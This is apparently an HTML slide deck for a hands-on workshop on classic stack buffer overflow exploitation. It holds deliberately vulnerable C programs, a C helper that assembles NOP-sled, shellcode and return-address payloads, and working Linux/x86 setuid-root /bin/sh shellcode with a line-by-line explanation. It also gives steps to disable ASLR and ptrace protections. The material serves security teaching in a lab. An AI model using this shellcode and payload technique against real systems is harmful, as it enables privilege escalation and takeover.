<!DOCTYPE html>
<html>
<head>
<title>♫ Stack smashing like it's 1999 ♫</title>
<meta charset="utf-8">
<style>
@import url(https://fonts.googleapis.com/css?family=Droid+Serif);
@import url(https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz);
@import url(https://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700,400italic);
body {
font-family: 'Droid Serif';
}
h1, h2, h3 {
font-family: 'Yanone Kaffeesatz';
font-weight: 400;
margin-bottom: 0;
}
.remark-slide-content h1 { font-size: 3em; }
.remark-slide-content h2 { font-size: 2em; }
.remark-slide-content h3 { font-size: 1.6em; }
.footnote {
position: absolute;
bottom: 3em;
font-size: 0.7em;
}
li p { line-height: 1.25em; }
.red { color: #fa0000; }
.large { font-size: 2em; }
a, a > code {
color: rgb(249, 38, 114);
text-decoration: none;
}
code {
background: #e7e8e2;
border-radius: 5px;
}
.remark-code, .remark-inline-code { font-family: 'Ubuntu Mono'; }
.remark-code-line-highlighted { background-color: #373832; }
.pull-left {
float: left;
width: 47%;
}
.pull-right {
float: right;
width: 47%;
}
.pull-right ~ p {
clear: both;
}
#slideshow .slide .content code {
font-size: 0.8em;
}
#slideshow .slide .content pre code {
font-size: 0.9em;
padding: 15px;
}
.inverse {
background: #272822;
color: #777872;
text-shadow: 0 0 20px #333;
}
.inverse h1, .inverse h2 {
color: #f3f3f3;
line-height: 0.8em;
}
/* Slide-specific styling */
#slide-inverse .footnote {
bottom: 12px;
left: 20px;
}
#slide-how .slides {
font-size: 0.9em;
position: absolute;
top: 151px;
right: 140px;
}
#slide-how .slides h3 {
margin-top: 0.2em;
}
#slide-how .slides .first, #slide-how .slides .second {
padding: 1px 20px;
height: 90px;
width: 120px;
-moz-box-shadow: 0 0 10px #777;
-webkit-box-shadow: 0 0 10px #777;
box-shadow: 0 0 10px #777;
}
#slide-how .slides .first {
background: #fff;
position: absolute;
top: 20%;
left: 20%;
z-index: 1;
}
#slide-how .slides .second {
position: relative;
background: #fff;
z-index: 0;
}
/* Two-column layout */
.left-column {
color: #777;
width: 20%;
height: 92%;
float: left;
}
.left-column h2:last-of-type, .left-column h3:last-child {
color: #000;
}
.right-column {
width: 75%;
float: right;
padding-top: 1em;
}
</style>
</head>
<body>
<textarea id="source">
name: inverse
layout: true
class: center, middle, inverse
---
# ♫ Stack smashing like it's 1999 ♫
Ward Wouts<br>
https://wizeazz.nl/smash/
---
# Agenda
[//]: # (This is a markdown comment.)
[//]: # (A proper markdown comment needs the empty line above it.)
[//]: # (Two spaces at the end of a line are a linebreak in markdown.)
Introduction
What is a stack?
How does this work?
Vulnerable functions
Now what can we do with this?
Shellcode?
Endianness?
Exploitation workflow
Demo
Protections
DIY
Quick Radare2 reference
Quick GDB reference
Shellcode explained
---
# Introduction
---
layout: false
.left-column[
## Introduction
]
.right-column[
C is full of holes, let's get to know one.
Old skool, so no OS or hardware protections. Which today is mostly relevant in IoT. (Remember, the `S` in `IoT` stands for Security.)
Stack smashing is making use of a buffer overflow vulnerability in code using variables on the stack. This type of vulnerability has been known for a long time. This attack was first properly documented in Phrack #49.
.footnote[[Phrack #49](http://www.phrack.org/issues/49/14.html#article)]
]
---
template: inverse
# What is a stack?
---
.left-column[
## What is a stack?
]
.right-column[
Stacks in computing architectures are regions of memory where data is added or removed in a last-in-first-out (LIFO) manner.
The stack is used to pass arguments between functions, to allocate space for fixed variables, and to remember how to get back out of the current function.
On x86 systems the stack grows downward: it starts at a high memory address and every push moves toward lower addresses.
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack-based_memory_allocation)]
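
To make the LIFO idea concrete, here is a minimal sketch of a toy stack in C. The names (`toy_stack`, `toy_push`, `toy_pop`) and the capacity are made up for this slide. Note that this toy grows upward through an array, while the real x86 stack moves toward lower addresses as it grows.

```c
#include <stddef.h>

#define STACK_CAP 8   /* arbitrary capacity for the sketch */

/* Toy LIFO stack: the last value pushed is the first one popped. */
struct toy_stack {
    int slots[STACK_CAP];
    size_t top;            /* number of items currently stored */
};

/* Push a value; returns 0 on success, -1 if the stack is full. */
int toy_push(struct toy_stack *s, int value)
{
    if (s->top >= STACK_CAP)
        return -1;
    s->slots[s->top++] = value;
    return 0;
}

/* Pop the most recently pushed value; returns -1 if the stack is empty. */
int toy_pop(struct toy_stack *s, int *out)
{
    if (s->top == 0)
        return -1;
    *out = s->slots[--s->top];
    return 0;
}
```

Pushing 1, 2, 3 and then popping three times hands back 3, 2, 1.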
]
---
.left-column[
## Say wut?
]
.right-column[
Whenever a function is called a frame is added to the stack. Whenever a function ends the frame is deleted.
Such a frame consists of local variables, a saved frame pointer and a return address.
]
---
.left-column[
## This is not helping you know...
]
.right-column.center.middle[
<img src="Stack.png" width="100%" />
]
---
template: inverse
# How does this work?
---
.left-column[
## How does this work?
]
.right-column[
## Start with some code:
``` C
#include <string.h>
void foo (char *bar)
{
char c[12];
strcpy(c, bar); // no bounds checking
}
int main (int argc, char **argv)
{
foo(argv[1]);
return 0;
}
```
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_2.png" width="70%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_3.png" width="70%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_4.png" width="85%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
template: inverse
# Vulnerable functions
---
.left-column[
## Vulnerable functions
]
.right-column[
Anything that doesn't take buffer sizes into account. The big ones being:
- gets
- strcpy
- sprintf
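
For contrast, a minimal sketch of size-aware alternatives built on the standard `snprintf` and `fgets`. The helper names `copy_bounded` and `read_line_bounded` are made up for this slide; this is one possible approach, not the only one.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: copy src into dst, never writing more than dst_size
 * bytes. Returns 0 if everything fit, -1 if the input was truncated. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return -1;
    int needed = snprintf(dst, dst_size, "%s", src);
    if (needed < 0 || (size_t)needed >= dst_size)
        return -1;
    return 0;
}

/* Hypothetical stand-in for gets(): read one line, drop the newline. */
int read_line_bounded(char *dst, size_t dst_size, FILE *in)
{
    if (dst_size == 0 || fgets(dst, (int)dst_size, in) == NULL)
        return -1;
    dst[strcspn(dst, "\n")] = '\0';
    return 0;
}
```

With `char c[12]`, a 20-character input is cut to 11 characters plus the terminator, and the caller gets `-1` back instead of a smashed stack.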
]
---
template: inverse
# Now what can we do with this?
---
.left-column[
## Now what can we do with this?
]
.right-column[
We can change the flow through the program:
- Jump to a different function in a known spot in memory
- Jump to our own shellcode somewhere in the buffer (can also write past the return address)
- Jump to our own shellcode in the environment
*Full nerd: By overwriting the return address we can change which instructions the Instruction Pointer (`EIP` in 32-bit x86, `RIP` in 64-bit x86) points to. `EIP` and `RIP` are so-called registers. There are more, like `EBP`/`RBP`, which points at the base of the current stack frame, and `ESP`/`RSP`, which points at the top of the stack. Most of the other registers are used like variables.*
.footnote[Lots of shellcode [here](http://shell-storm.org/shellcode/)]
]
---
template: inverse
# Shellcode?
---
.left-column[
## Shellcode?
]
.right-column[
In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. [1]
Here's a bit of shellcode to open `/bin/sh` on 32-bit x86 (37 bytes) [2]:
```
\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2
\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x52\x53\x89\xe1\xcd\x80
```
As strings in C are NUL-terminated, functions like `strcpy` stop copying at the first `\x00`, so shellcode should not contain that byte.
`\x90` is a NOP (No Operation) in x86. You can use a bunch of those in front of shellcode to increase the chances of ending up in your shellcode. This is called a NOP-sled.
Sometimes swapping out some shellcode for some other shellcode is the trick.
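
A quick way to sanity-check a candidate payload is to scan it for zero bytes before using it. The sketch below does that and also shows how a NOP-sled is filled; the function names are made up for this slide.

```c
#include <stddef.h>
#include <string.h>

/* Return the index of the first 0x00 byte in code, or -1 if there is none. */
long first_nul_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return (long)i;
    return -1;
}

/* Fill the first sled_len bytes of buf with x86 NOPs (0x90). */
void fill_nop_sled(unsigned char *buf, size_t sled_len)
{
    memset(buf, 0x90, sled_len);
}
```

For example, `mov $0x17, %eax` assembles to `b8 17 00 00 00`, which fails this check at index 2. That is why shellcode tends to load small constants with a `push`/`pop` pair instead.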
.footnote[[1] Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Shellcode)<br>[2] Shellcode from [shell-storm](http://shell-storm.org/shellcode/files/shellcode-251.php)]
]
---
template: inverse
# Endianness?
---
.left-column[
## Endianness?
]
.right-column[
In computing, endianness refers to the order of bytes (or sometimes bits) within a binary representation of a number. It can also be used more generally to refer to the internal ordering of any representation, such as the digits in a numeral system or the sections of a date.
In its most common usage, endianness indicates the ordering of bytes within a multi-byte number. A **big-endian** ordering places the most significant byte first and the least significant byte last, while a **little-endian** ordering does the opposite. For example, consider the unsigned hexadecimal number 0x1234, which requires at least two bytes to represent. In a big-endian ordering they would be `[ 0x12, 0x34 ]`, while in a little-endian ordering, the bytes would be arranged `[ 0x34, 0x12 ]`.
x86 is a **little-endian** architecture
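
In practice this matters when you write an address into a payload byte by byte. A minimal sketch, with `pack_le32` as a made-up helper name and `0xffffd5a0` as a purely illustrative address:

```c
#include <stdint.h>

/* Store a 32-bit value into out[0..3] in little-endian byte order:
 * least significant byte first. */
void pack_le32(uint32_t value, unsigned char out[4])
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

So the address `0xffffd5a0` ends up in memory as `\xa0\xd5\xff\xff`.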
]
---
template: inverse
# Exploitation workflow
---
.left-column[
## Exploitation workflow
]
.right-column[
- Find input to overflow
- Figure out the exact length needed for the overflow to overwrite the return address
- Place shellcode in memory, ideally with a NOP-sled in front
- Figure out shellcode location
- Use overflow to point the return address at shellcode/NOP-sled
- Do take endianness into account
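
The steps above boil down to a byte layout: NOP-sled, shellcode, filler, return address. Below is a rough sketch of that layout for a 32-bit target. `build_payload` and all its parameters are made up for this slide, and the offset and address are things you have to find yourself with a debugger.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical layout helper: [NOP sled][shellcode][filler][return address].
 * ret_offset is the distance from the start of the buffer to the saved
 * return address. Returns the payload length, or 0 if it does not fit. */
size_t build_payload(unsigned char *out, size_t out_size,
                     size_t sled_len,
                     const unsigned char *code, size_t code_len,
                     size_t ret_offset, uint32_t ret_addr)
{
    if (sled_len > ret_offset || code_len > ret_offset - sled_len)
        return 0;                            /* sled + code must fit before ret */
    if (out_size < 4 || ret_offset > out_size - 4)
        return 0;                            /* no room for the address */

    memset(out, 'A', ret_offset);            /* filler everywhere first */
    memset(out, 0x90, sled_len);             /* NOP sled at the front */
    memcpy(out + sled_len, code, code_len);  /* shellcode right after the sled */
    for (int i = 0; i < 4; i++)              /* address in little-endian order */
        out[ret_offset + i] = (unsigned char)(ret_addr >> (8 * i));
    return ret_offset + 4;
}
```

Keep in mind that the address itself must not contain a `\x00` byte either if the overflow goes through a string function.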
]
---
template: inverse
# Demo
---
.left-column[
## Demo
]
.right-column[
This is the code for the binary:
``` C
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char * argv[]){
char buf[128];
if(argc == 1){
printf("Usage: %s argument\n", argv[0]);
exit(1);
}
strcpy(buf,argv[1]);
printf("%s", buf);
return 0;
}
```
Binary here: https://wizeazz.nl/smash/code/demo
.footnote[Borrowed from [Overthewire.org](https://overthewire.org/wargames/narnia/)]
]
---
template: inverse
# Protections
---
.left-column[
## Protections
]
.right-column[
- Stack canaries<br>
Place a value before the return address and check if it's been changed before returning from a function. (Good explainer here: https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/)
- Nonexecutable stack<br>
W^X (write xor execute): memory is either writable or executable, never both, so code on the stack won't run (but return addresses are still followed).
- Randomization<br>
Change function and stack addresses around so whenever a program is executed the locations are different.
All these can be worked around given the right conditions. They just make things annoying, euh, harder.
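
To see why a canary catches a plain overflow, here is a toy model of a frame in C. Everything in it (`toy_frame`, `CANARY_VALUE`, the helper names) is made up for this slide. Real canaries are random per process and the check is inserted by the compiler, not written by hand.

```c
#include <stddef.h>
#include <string.h>

#define CANARY_VALUE 0xdeadc0deu   /* made-up constant for the sketch */

/* Toy frame: buffer first, canary next, return address last. */
struct toy_frame {
    char buf[8];
    unsigned int canary;
    unsigned int ret_addr;
};

void frame_init(struct toy_frame *f, unsigned int ret_addr)
{
    memset(f->buf, 0, sizeof f->buf);
    f->canary = CANARY_VALUE;
    f->ret_addr = ret_addr;
}

/* Unchecked copy starting at buf, clamped only to the frame itself so the
 * sketch stays well-defined. Mimics strcpy() running past buf. */
void frame_write(struct toy_frame *f, const void *data, size_t len)
{
    if (len > sizeof *f)
        len = sizeof *f;
    memcpy(f, data, len);
}

/* What the function epilogue checks before it trusts ret_addr. */
int canary_intact(const struct toy_frame *f)
{
    return f->canary == CANARY_VALUE;
}
```

Writing 8 bytes leaves the canary alone. Writing 16 bytes of `A` reaches the return address, but only by trampling the canary on the way, so the check fails before the function returns.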
]
---
template: inverse
# DIY
---
.left-column[
## DIY
]
.right-column[
Now it's your turn.
Log into the provided VM. Binary and shellcode are in `/smash`
**Alternative:** If you want to use your own system, do this as preparation:
- Install radare2: `$ sudo apt-get install -y radare2`<br>**OR**<br> `$ git clone https://github.com/radareorg/radare2.git && cd radare2 && sys/user.sh`<br>for a persistent installation.
- Turn off ASLR: `$ sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"`
- Check: `$ sysctl -a --pattern randomize`
- Enable debugging: `$ sudo sh -c "echo 0 > /proc/sys/kernel/yama/ptrace_scope"`
- Download binary:<br> `$ curl -O https://wizeazz.nl/smash/code/diy`
- Make executable: `$ chmod a+x diy`
.footnote[Linux and ASLR settings [here](https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/)]
]
---
.left-column[
## DIY
]
.right-column[
Assignment:
- Make the binary print `You win`.
This is the code for the binary:
``` C
#include <stdio.h>
#include <strings.h>
void winner()
{
printf("You win\n");
}
void whoareyou()
{
char name[250];
printf("What's your name? ");
gets(name);
printf("\nHello, %s\n", name);
}
int main()
{
whoareyou();
printf("You lose\n");
}
```
]
---
.left-column[
## DIY
]
.right-column[
Now, if you managed that:
- Try to make it open a shell via shellcode. Especially fun if you make the binary SUID root:<br> `$ sudo chown root:root diy && sudo chmod u+s diy`
- Can be done both via shellcode in an environment variable (usually more reliable **HINT**) and via shellcode in the buffer
Tip: once `gets()` has consumed your input, stdin hits end-of-file and the shell you just spawned exits immediately. The trick is to keep stdin open with something like:<br>
`$ (echo -e MYINPUT; cat)|./diy`<br>
This won't give you a prompt!
]
---
template: inverse
# Quick Radare2 reference
---
.left-column[
## Quick Radare2 reference
]
.right-column[
- `r2 -Ad <program>` start radare2 in debugger mode and analyse program
- `afl` list functions
- `pdf@<function>` disassemble function (e.g. `pdf@main`)
- `pxw @<location>` print memory (e.g. `pxw @ebp`)
- `db <address>` Set breakpoint
- `dc` continue to breakpoint
- `ds` step into
- `V` go to visual mode
- `q` leave visual mode
- `p` next view (2x for debugger view)
- `s` step into
- `S` step over
- `?v HEX` built-in calculator (e.g. `?v 0xdead0000+0xbeef`)
- `?vi HEX` hex to integer (e.g. `?vi 0x400`)
]
---
template: inverse
# Quick GDB reference
---
.left-column[
## Quick GDB reference
]
.right-column[
- `gdb --args <program> <arguments>` start gdb with a program with arguments
- `disas <function>` disassemble a function
- `b *<address>` set a breakpoint on an address
- `x/200x $esp` show 200 units of memory in hex (4-byte words by default), starting at the address `$esp` points to
- `x/200c <addr>` show the memory contents for 200 characters starting at the address
- `r` run
- `r < foo.txt` run with stdin filled from a file
- `c` continue
- `s` step into
- `info functions` list all functions
- `p (char*)getenv("PATH")` find the memory location of an environment variable for the running program (use a breakpoint!)
Many improvements exist to make gdb nicer for reverse engineering, such as:
- https://github.com/pwndbg/pwndbg
- https://github.com/hugsy/gef
- https://github.com/longld/peda
]
---
template: inverse
# Shellcode explained
---
.left-column[
## Shellcode explained
]
.right-column[
Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html
```
/* (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL])
* - 37 bytes - xgc@gotfault.net */
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80" // int $0x80
```
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
push $0x17 Put 0x17 = 23 = setuid
pop %eax in EAX
xor %ebx, %ebx Make EBX (argument for setuid) 0
int $0x80 Execute command
```
`int 0x80` is a legacy way of doing a syscall to the kernel. See also: http://www.linfo.org/int_0x80.html
As this is a 32-bit program, the list of syscalls can be found in `/usr/include/asm/unistd_32.h`, which shows the values in decimal: 0x17 = 23 = setuid.
So, what's done here is: put 0x17 in EAX, and make EBX (the argument for setuid, see https://faculty.nps.edu/cseagle/assembly/sys_call.html) 0 using an XOR. Then call `int 0x80`, resulting in a `setuid(0)`.
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
push $0x2e Put 0x2e = 46 = setgid
pop %eax in EAX
push %ebx ... this baffles me, seems unneeded ...
int $0x80 Execute command
```
Pretty much the same as last snippet, but for 0x2e = 46 = setgid.
Not only does that push EBX seem unneeded, removing it has no impact on getting a shell. So in explaining this shellcode I managed to turn it into 36 bytes instead of 37.
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
xor %edx, %edx Make EDX 0
push $0xb Put 0xb = 11 = execve
pop %eax in EAX
push %edx Push NULL terminated
push $0x68732f2f command
push $0x6e69622f string to stack
mov %esp, %ebx Point EBX at command string
push %edx Push NULL to stack (no more arguments)
push %ebx Push pointer to command str
mov %esp, %ecx Point ECX at arg list
int $0x80 Execute command in EAX
```
Another `int 0x80` here, for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little-endian, so read `//sh`. Same for 0x6e69622f, which gives `/bin`. Together this makes `/bin//sh`. The double `/` is there to fill that 32-bit word. The EDX that is set to 0 and pushed first provides the NUL string terminator.
The arguments for execve will not fit in registers, as they're variable size. So instead ECX points at a list of pointers to strings (command name + arguments) on the stack (i.e. ARGV in C). EBX points to the command to execute, and EDX (the environment pointer) stays 0.
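
If you want to check the string decoding yourself, the sketch below rebuilds what a series of 32-bit pushes leaves in memory. `pushes_to_string` is a made-up helper for this slide and assumes a little-endian, downward-growing stack as on x86.

```c
#include <stddef.h>
#include <stdint.h>

/* Rebuild the bytes that a series of 32-bit pushes leaves on the stack.
 * words[] is in push order; the last word pushed sits at the lowest
 * address, so it comes first in memory. out must hold 4 * count + 1 bytes. */
void pushes_to_string(const uint32_t *words, size_t count, char *out)
{
    size_t pos = 0;
    for (size_t w = count; w-- > 0; ) {       /* last pushed word first */
        for (int b = 0; b < 4; b++)           /* little-endian byte order */
            out[pos++] = (char)((words[w] >> (8 * b)) & 0xff);
    }
    out[pos] = '\0';
}
```

Feeding it `0x68732f2f` followed by `0x6e69622f` (the push order in the shellcode) yields `/bin//sh`.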
]
</textarea>
<script src="https://remarkjs.com/downloads/remark-latest.min.js">
</script>
<script>
var slideshow = remark.create();
</script>
</body>
</html>